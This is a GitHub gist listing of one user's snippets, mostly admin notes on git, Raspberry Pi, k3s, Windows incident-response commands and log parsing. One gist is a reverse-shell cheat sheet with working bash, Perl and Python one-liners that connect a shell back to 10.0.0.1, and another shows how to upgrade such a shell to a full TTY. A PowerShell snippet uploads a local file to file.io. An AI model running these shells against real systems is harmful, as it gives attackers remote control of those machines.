Skip to content

Instantly share code, notes, and snippets.

View rollwagen's full-sized avatar
:octocat:

rollwagen rollwagen

:octocat:
18 followers · 30 following
View GitHub Profile
@rollwagen
rollwagen / git_enable_color.sh
Last active December 20, 2019 16:48
Git command line color output.
git config --global color.ui true
git config --get color.ui
@rollwagen
rollwagen / TTY_reverse_shell.sh
Last active May 10, 2024 15:45
Upgrading simple (reverse-)shells to fully interactive TTYs
#######################################################
# Upgrading simple shells to fully interactive TTYs #
#######################################################
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali or elsewhere
$ echo $TERM
@rollwagen
rollwagen / reverse_shells_cheat_sheet.sh
Last active December 20, 2019 16:45
Reverse shells cheat sheet (various languages)
# Bash - Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#PERL - Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
## There’s also an alternative PERL revere shell here [http://www.plenz.com/reverseshell]
# Python - This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
@rollwagen
rollwagen / my_own_cheat_sheet.md
Last active July 14, 2022 04:07
Useful windows command line commands for incident investigations. #windows #powershell #wmic

Unusual Processes, Services, Reg keys, Scheduled tasks, Accounts

Unusual Processes

cmd.exe

taskmgr.exe
tasklist
wmic process list full
@rollwagen
rollwagen / pi_wlan_access_point.md
Last active December 20, 2019 18:19
Configuring wifi interface on Raspberry as WLAN access point. #raspi #wlan

Configuring wifi interface on Raspberry as WLAN access point

Configuration steps

sudo apt-get install hostapd
sudo apt-get install dnsmasq

sudo systemctl stop hostapd
sudo systemctl stop dnsmasq
@rollwagen
rollwagen / powershell_file_io_upload.ps1
Last active May 11, 2023 23:29
powershell snippets #powershell #upload
$sourceFilePath = "/etc/apt/archive"
$siteAddress = "https://file.io/?expires=1w"
$webClient = New-Object System.Net.WebClient
$response
try {
$response = $webClient.UploadFile($siteAddress,$sourceFilePath)
} catch {
Write-Host $_
}
[System.Text.Encoding]::ASCII.GetString($response)
@rollwagen
rollwagen / k3s_raspberry_pi_cluster.md
Last active November 8, 2021 14:51
Creating a k8s cluster on Raspberries.

Ubuntu

Flash SD card with Ubuntu image

xzcat ubuntu-19.10.1-preinstalled-server-arm64+raspi3.img.xz | sudo dd of=/dev/disk6 bs=32m`

Boot Raspberry. Headless possibel with Ubuntu image as SSH login enabled by default in image.

Login / Set-up SSH

$ ssh [email protected] - test login via ssh (ubuntu/ubuntu)

@rollwagen
rollwagen / k8s_k3sup_vagrant_mac.md
Last active January 24, 2020 15:59
Running k8s with k3sup in a Ubuntu VM on MacOs using Vagrant (vagrant-vmware-desktop). #k8s #k3sup

Running k8s with k3sup in a Ubuntu VM on MacOs using Vagrant (vagrant-vmware-desktop)

Vagrantfile

Vagrant.configure("2") do |config|
  config.vm.box = "bento/ubuntu-19.10"
end

vagrant up

Pre-reqs/info to actually run k3sup

VM's (real) IP adress

@rollwagen
rollwagen / vsftpd_log_parse.sh
Last active May 8, 2020 07:45
Extract IPs from vsftpd.log and resolve/print geo-location.
IP_ADDRESSES=`cat vsftpd.log | grep CONNECT | awk -F':' '{print $7}'|sed 's/\"//'|sort|uniq|tr '\n' ' '`
for address in $IP_ADDRESSES; do
curl --silent http://api.ipstack.com/${address}?access_key=$IPSTACK_KEY | jq '.city, .country_name, .continent_name'| tr '\n' ','|sed "s/,$//"
done
@rollwagen
rollwagen / port_forwardeing.md
Last active May 24, 2021 10:06
Port forwarding (linux, mac, ssh)